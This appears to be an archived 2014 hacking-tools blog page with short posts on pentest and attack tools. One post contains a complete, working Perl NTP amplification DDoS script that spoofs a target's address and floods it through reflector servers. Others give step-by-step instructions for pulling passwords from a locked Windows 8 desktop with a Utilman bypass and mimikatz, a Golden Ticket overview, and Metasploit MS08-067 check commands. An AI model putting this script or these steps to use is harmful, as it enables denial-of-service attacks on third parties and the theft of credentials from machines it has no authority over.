Feb 1, 2014

Tools: Introspy-iOS

The tracer can be installed on a jailbroken device to hook and log security-sensitive iOS APIs called by applications running on the device. The tool records details of relevant API calls, including arguments and return values and persists them in a database. Additionally, the calls are also sent to the Console for real-time analysis.
The database can then be fed to Introspy-Analyzer, a Python script to generate HTML reports containing the list of logged function calls as well as a list of potential vulnerabilities affecting the application. Introspy-Analyzer is hosted on a separate repository: https://github.com/iSECPartners/Introspy-Analyzer

Source: https://github.com/iSECPartners/Introspy-iOS



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 31, 2014

Howto: Mimikatz - Howto use it

mimikatz - Golden Ticket

We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.

Here is the list of what you need to make it work:
  • krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
  • Username that we'd like to impersonate

    As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
    As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info.






    Source: http://rycon.hu/papers/goldenticket.html




    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Article: ระบบของคุณเตรียมพร้อมกับ DDoS ยุคใหม่แล้วหรือยัง

    บทความจากทีมงาน CSIRT ของบริษัท I-SECURE จำกัด, www.i-secure.co.th ครับ

     https://dl.dropboxusercontent.com/u/2330423/%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%9A%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B9%80%E0%B8%95%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%81%E0%B8%B1%E0%B8%9A%20DDoS%20%E0%B8%A2%E0%B8%B8%E0%B8%84%E0%B9%83%E0%B8%AB%E0%B8%A1%E0%B9%88%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7%E0%B8%AB%E0%B8%A3%E0%B8%B7%E0%B8%AD%E0%B8%A2%E0%B8%B1%E0%B8%87.pdf


    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Howto: Checking Server Of Amplification Attack

    - Check Server that have NTP Amplification Vulnerability
    http://openntpproject.org/
        Test with ntpdc -c monlist <NTP_SERVER_IP>, if you want to test in Backtrack, Linux, you must install ntp packet.
     
    - Check Server that have DNS Amplification Vulnerability
    http://openresolverproject.org/


    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Tools: NTP Amplification Attack Tool

    use threads;
    use Socket;
     
    my $num_of_threads = $ARGV[5];
    my $target = $ARGV[0];
    my $udp_src_port = $ARGV[1];
    my $time = $ARGV[2];
    #Open Input List.
    my $openme = $ARGV[3];
     
    open my $handle, '<', $openme;
    chomp(my @servers = <$handle>);
    close $handle;
     
    my $ppr = $ARGV[4];
    my @threads = initThreads();
    print "I guess im attacking $target for $time seconds with $num_of_threads threads\n";
     
    #Does the list exist?
    if (-e $openme) {
    print "Using $openme as list.\n";
    }
    unless (-e $openme) {
    print "List does not exist.\n";
    exit();
    }
     
    #Start Threading
    foreach(@threads){
    $_ = threads->create(\&attackshit);
    }
    foreach(@threads){
    $_->join();
    }
     
    sub initThreads{
    my @initThreads;
    for(my $i = 1;$i<=$num_of_threads;$i++){
    push(@initThreads,$i);
    }
    return @initThreads;
    }
     
     
    #Start DDosing.
    sub attackshit{
    alarm("$time");
    repeat: my $ip_dst = ( gethostbyname( $servers[ int( rand(@servers) ) ] ) )[4];
    my $ip_src = ( gethostbyname($target) )[4];
    socket( RAW, AF_INET, SOCK_RAW, 255 ) or die $!;
    setsockopt( RAW, 0, 1, 1 );
    main();
     
    sub main {
    my $packet;
    $packet = ip_header();
    $packet .= udp_header();
    $packet .= payload();
    #send_packet($packet) && goto repeat;
    #send_packet($packet)
    for (1 .. $ppr) {
    send_packet($packet) or last;
    }
    goto repeat;
    }
     
    sub ip_header {
    my $ip_ver = 4;
    my $ip_header_len = 5;
    my $ip_tos = 0;
    my $ip_total_len = $ip_header_len + 20;
    my $ip_frag_id = 0;
    my $ip_frag_flag = "010";#"\x30\x31\x30";
    my $ip_frag_offset = "0000000000000";#"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30";
    my $ip_ttl = 255;
    my $ip_proto = 17;
    my $ip_checksum = 0;
    my $ip_header = pack( "H2 H2 n n B16 h2 c n a4 a4",#"\x48\x32\x20\x48\x32\x20\x6E\x20\x6E\x20\x42\x31\x36\x20\x68\x32\x20\x63\x20\x6E\x20\x61\x34\x20\x61\x34",
    $ip_ver.$ip_header_len,
    $ip_tos,
    $ip_total_len,
    $ip_frag_id,
    $ip_frag_flag.$ip_frag_offset,
    $ip_ttl,
    $ip_proto,
    $ip_checksum,
    $ip_src,
    $ip_dst
    );
    return $ip_header;
    }
     
    sub udp_header {
    my $udp_dst_port = 123;
    my $udp_len = 8 + length( payload() );
    my $udp_checksum = 0;
    my $udp_header = pack(
    "n n n n",#"\x6E\x20\x6E\x20\x6E\x20\x6E",
    $udp_src_port,
    $udp_dst_port,
    $udp_len,
    $udp_checksum
    );
    return $udp_header;
    }
     
    sub payload {
    my $data = "\x17\x00\x03\x2a" . "\x00" x 4;
    my $payload = pack( "a".length($data), $data );
    return $payload;
    }
     
    sub send_packet {
    send( RAW, $_[0], 0, pack( "Sna4x8", AF_INET, 60, $ip_dst ) );
    }
     
    }
     
     



    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Tools: VMware Unlocker to Run Mac OS X Guests in Windows 7/8/8.1

    To be a Hackintosh user in desktop virtualization software VMware is must For making USB installer,Restoring images and so on then the “VMware unlocker” is a compulsory utility to run Mac OS X guests. This unlocker utility over right  few VMware program files to be able to install and run latest 10.7,10.8 and 10.9 Lion OS X guests. 
    Here is the download links http://hackintoshmumbai.com/Download/




    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Tools: Wifijammer

    Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting.
    Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection

    Source: https://github.com/DanMcInerney/wifijammer



    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Jan 30, 2014

    Tools: Quarks PwDump - Dump password of Windows

    Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test.
    Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems.
    It currently extracts : Local accounts NT/LM hashes + history Domain accounts NT/LM hashes + history stored in NTDS.dit file Cached domain credentials Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit


    Source: http://blog.quarkslab.com/quarks-pwdump.html


    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Jan 29, 2014

    Howto: Create initial user in Metasploit with Web UI

    For anyone who install Metasploit on server and cannot access Web UI of Metasploit but you want to create initial user for web ui access, please follows this steps.

    1. Using diagnostic_shell in metasploit
    sudo /opt/metasploit/diagnostic_shell

    2. Go to script folder
    cd /opt/metasploit/apps/pro/ui


    3. Create initial user with script
    ruby script/createuser

    *** If you want to configure binding interface of metasploit web UI, try to custom /opt/metasploit/properties.ini


    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Jan 28, 2014

    Howto: Load cleart text password from locked Desktop of Windows 8

    1. You must have a physical access

    2. Use "Utilman Login Bypass", pressing the “Windows” and “u” key on the keyboard.

    3. Plug USB that have Mimikatz(download from: http://blog.gentilkiwi.com/mimikatz)

    4.  Run mimikatz

    5. Use privilege::debug in mimikatz console

    6. Use inject::process in mimikatz console. Ex. inject::process lsass.exe sekurlsa.dll

    7. Run @getLogonPasswords in mimikatz console

    8. After last command, you will get hashed password of current logged in user.



    *** In new version, you can skip #5,#6 with sekurlsa::logonPasswords or sekurlsa::logonPasswords full


    Source: http://cyberarms.wordpress.com/2012/11/10/windows-8-clear-text-passwords-from-locked-desktop-with-mimikatz/

    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Jan 26, 2014

    Tools: rekall - Memory Forensics Analysis framework

    The Rekall Memory Forensics Framework

     

    Source: https://code.google.com/p/rekall/https://code.google.com/p/rekall/



    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Howto: Multi-host check in Metasploit allows you to pwn faster

    msf > use exploits/windows/smb/ms08_067_netapi
    msf > check 192.168.1.1-192.168.1.100

    Waiting for results  

     

    Source: https://twitter.com/_sinn3r/status/427202485174800384/photo/1

    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.

    Tools: DDOSIM - Layer 7 DDoS Simulator

    DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server).

    Source:  http://sourceforge.net/projects/ddosim/


    If you like my blog, Please Donate Me
    Or Click The Banner For Support Me.
     

    Sponsors

    lusovps.com

    Blogroll

    About

     Please subscribe my blog.

     Old Subscribe

    Share |